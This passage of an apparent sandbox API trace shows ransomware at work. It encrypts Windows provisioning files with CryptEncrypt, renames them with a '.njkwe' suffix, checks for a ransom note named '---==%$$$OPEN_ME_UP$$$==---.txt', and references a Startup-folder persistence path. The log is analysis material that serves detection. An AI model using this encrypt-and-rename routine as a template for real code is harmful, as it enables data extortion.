lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.653] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\522__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.654] GetTickCount () returned 0x1154b8c [0081.654] GetTickCount () returned 0x1154b8c [0081.654] GetTickCount () returned 0x1154b8c [0081.654] GetTickCount () returned 0x1154b8c [0081.654] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.654] GetProcessHeap () returned 0xbe0000 [0081.654] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.654] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1cd, lpOverlapped=0x0) returned 1 [0081.655] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.655] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1cd, lpOverlapped=0x0) returned 1 [0081.655] GetProcessHeap () returned 0xbe0000 [0081.655] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.655] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.655] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.656] CloseHandle (hObject=0x43c) returned 1 [0081.656] GetProcessHeap () returned 0xbe0000 [0081.656] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.656] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0081.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\522__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\522__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\522__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.659] GetProcessHeap () returned 0xbe0000 [0081.659] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.659] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="523__C~1.PRO")) returned 1 [0081.659] lstrcmpiW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.659] lstrcmpiW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.659] lstrcmpiW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.659] lstrcmpiW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.659] lstrcmpiW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.659] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.659] StrStrIW (lpFirst="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.659] lstrcmpW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.659] lstrcmpW (lpString1="523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.659] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.659] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\523__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.660] GetTickCount () returned 0x1154b9c [0081.660] GetTickCount () returned 0x1154b9c [0081.660] GetTickCount () returned 0x1154b9c [0081.660] GetTickCount () returned 0x1154b9c [0081.660] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.660] GetProcessHeap () returned 0xbe0000 [0081.660] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.660] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.661] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.661] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.661] GetProcessHeap () returned 0xbe0000 [0081.661] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.661] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.661] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.669] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.669] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.669] CloseHandle (hObject=0x43c) returned 1 [0081.669] GetProcessHeap () returned 0xbe0000 [0081.669] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.669] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\523__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\523__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\523__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.670] GetProcessHeap () returned 0xbe0000 [0081.670] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.670] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", cAlternateFileName="524__C~1.PRO")) returned 1 [0081.670] lstrcmpiW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.671] lstrcmpiW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.671] lstrcmpiW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.671] lstrcmpiW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.671] lstrcmpiW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.671] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml") returned 159 [0081.671] StrStrIW (lpFirst="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.671] lstrcmpW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.671] lstrcmpW (lpString1="524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.671] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.671] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\524__connections_cellular_sabafon (yemen)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.671] GetTickCount () returned 0x1154b9c [0081.671] GetTickCount () returned 0x1154b9c [0081.671] GetTickCount () returned 0x1154b9c [0081.671] GetTickCount () returned 0x1154b9c [0081.671] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.671] GetProcessHeap () returned 0xbe0000 [0081.671] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.672] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0081.704] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.704] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0081.704] GetProcessHeap () returned 0xbe0000 [0081.704] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.704] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.704] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.705] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.705] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.705] CloseHandle (hObject=0x43c) returned 1 [0081.705] GetProcessHeap () returned 0xbe0000 [0081.705] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.705] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0081.705] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\524__connections_cellular_sabafon (yemen)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\524__Connections_Cellular_Sabafon (Yemen)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\524__connections_cellular_sabafon (yemen)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.706] GetProcessHeap () returned 0xbe0000 [0081.706] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.706] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912ac947, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912ac947, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912ac947, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="525__C~1.PRO")) returned 1 [0081.706] lstrcmpiW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.706] lstrcmpiW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.706] lstrcmpiW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.706] lstrcmpiW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.706] lstrcmpiW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.706] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml") returned 156 [0081.706] StrStrIW (lpFirst="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.706] lstrcmpW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.706] lstrcmpW (lpString1="525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.706] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.706] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\525__connections_cellular_idea (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.707] GetTickCount () returned 0x1154bcb [0081.707] GetTickCount () returned 0x1154bcb [0081.707] GetTickCount () returned 0x1154bcb [0081.707] GetTickCount () returned 0x1154bcb [0081.707] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.707] GetProcessHeap () returned 0xbe0000 [0081.707] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.707] ReadFile (in: hFile=0x43c, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0081.708] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.708] WriteFile (in: hFile=0x43c, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0081.709] GetProcessHeap () returned 0xbe0000 [0081.709] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.709] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.709] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.709] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.709] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.709] CloseHandle (hObject=0x43c) returned 1 [0081.709] GetProcessHeap () returned 0xbe0000 [0081.709] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.709] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0081.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\525__connections_cellular_idea (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\525__Connections_Cellular_Idea (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\525__connections_cellular_idea (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.710] GetProcessHeap () returned 0xbe0000 [0081.710] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.710] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x912d2bb2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x912d2bb2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x912d2bb2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="526__C~1.PRO")) returned 1 [0081.710] lstrcmpiW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.710] lstrcmpiW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.710] lstrcmpiW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.710] lstrcmpiW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.710] lstrcmpiW (lpString1="526__Connections_Cellular_MTNL (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.710] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: 